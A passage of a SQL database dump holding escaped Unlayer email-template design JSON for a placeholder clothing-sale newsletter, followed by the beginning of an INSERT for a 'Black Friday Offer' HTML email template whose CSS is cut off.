E<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":152,\\\"calculatedHeight\\\":36}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#e8dcd0\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\\\",\\\"fullWidth\\\":false,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false,\\\"width\\\":600,\\\"height\\\":224},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"NcaesyMqCK\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"D15V5OdQMy\\\",\\\"contents\\\":[{\\\"id\\\":\\\"a9T_o4TtZN\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a77d6d\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: \'Playfair Display\', serif; font-size: 14px; line-height: 19.6px;\\\\\\\"><strong><span style=\\\\\\\"font-size: 34px; line-height: 47.6px;\\\\\\\">UP TO <span style=\\\\\\\"font-size: 44px; line-height: 61.6px;\\\\\\\">50<\\/span>% OFF<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"LJC_ksl8Gr\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#34495e\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 22px; line-height: 30.8px;\\\\\\\">L o r e m&nbsp; &nbsp;i p s u m&nbsp; &nbsp;d o l o r<\\/span><\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"ch7zwTHuZu\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"48%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#34495e\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"5px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"uhMkQt1D2G\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\"><span style=\\\\\\\"font-family: \'comic sans ms\', sans-serif; font-size: 14px; line-height: 22.4px;\\\\\\\">\\\\\\\" Lorem ipsum dolor sit amet, consectetur adipiscing elit,<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\"><span style=\\\\\\\"font-family: \'comic sans ms\', sans-serif; font-size: 14px; line-height: 22.4px;\\\\\\\">sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\"><span style=\\\\\\\"font-family: \'comic sans ms\', sans-serif; font-size: 14px; line-height: 22.4px;\\\\\\\">Ut enim ad minim veniam \\\\\\\"<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"2z6L5HzXUD\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#a87f6b\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">R E A D&nbsp; M O R E<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":152,\\\"calculatedHeight\\\":36}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"Z4VToBS4B9\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"ch6yDS0JPN\\\",\\\"contents\\\":[{\\\"id\\\":\\\"CtdZ0tZmlt\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"25px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"n2PBpeWvwY\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a47e6b\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_8\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 36px; line-height: 50.4px;\\\\\\\">A Simple Guide to<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 36px; line-height: 50.4px;\\\\\\\">Minimalist S<\\/span><span style=\\\\\\\"font-size: 36px; line-height: 50.4px;\\\\\\\">tyle.<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"Yqj5K-50GA\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"5px 10px 50px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#a87f6b\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_2\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">S H O P&nbsp; &nbsp;N O W<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":144,\\\"calculatedHeight\\\":36}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffefef\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612264788124-cc.png\\\",\\\"fullWidth\\\":false,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false,\\\"width\\\":600,\\\"height\\\":285},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"gPbBQY2Q9v\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"w4JwDjRYXv\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UqCJOkDb9C\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a5726e\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_9\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 19.6px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 19.6px; font-size: 14px;\\\\\\\">F O L L O W&nbsp; &nbsp;A L O N G&nbsp; &nbsp;W I T H&nbsp; &nbsp;U S<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"rktmzZAX4g\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"28%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#ca979a\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"tIS5FWVh8R\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"rounded\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/pinterest.com\\/\\\",\\\"name\\\":\\\"Pinterest\\\"},{\\\"url\\\":\\\"https:\\/\\/youtube.com\\/\\\",\\\"name\\\":\\\"YouTube\\\"},{\\\"url\\\":\\\"https:\\/\\/instagram.com\\/\\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\"https:\\/\\/soundcloud.com\\/\\\",\\\"name\\\":\\\"SoundCloud\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":14,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"ozkROz9f_1\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"150%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 150%;\\\\\\\">212 26th St &nbsp;| &nbsp;Santa Monica &nbsp;| &nbsp;CA &nbsp;| &nbsp;90402&nbsp;<\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 150%;\\\\\\\">Cloth Inc. &nbsp;All rights reserved.&nbsp;<\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 150%;\\\\\\\">Company No. 123456789<br \\/>Manage Preferences | Unsubscribe &nbsp;| View in browser&nbsp;<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"UkkBWxvzv8\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"otIuyp2NLU\\\",\\\"contents\\\":[{\\\"id\\\":\\\"3YxPW0zruG\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_11\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Too many emails?&nbsp; <span style=\\\\\\\"text-decoration: underline; font-size: 14px; line-height: 19.6px;\\\\\\\">Unsubscribe<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#a47e6b\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Arial\\\",\\\"value\\\":\\\"arial,helvetica,sans-serif\\\"},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":true},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#e1d0c6\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":9}\"', '', 0, '2022-08-29 11:31:07');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(3, 'Black Friday Offer', '', 0, 1, 'english', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-32 {\\r\\n    width: 192px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-48p17 {\\r\\n    width: 289.02px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-48p5 {\\r\\n    width: 291px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-49p83 {\\r\\n    width: 298.98px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 300px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50p17 {\\r\\n    width: 301.02px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-51p5 {\\r\\n    width: 309px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-51p83 {\\r\\n    width: 310.98px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-68 {\\r\\n    width: 408px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: calc(100% - 40px) !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: 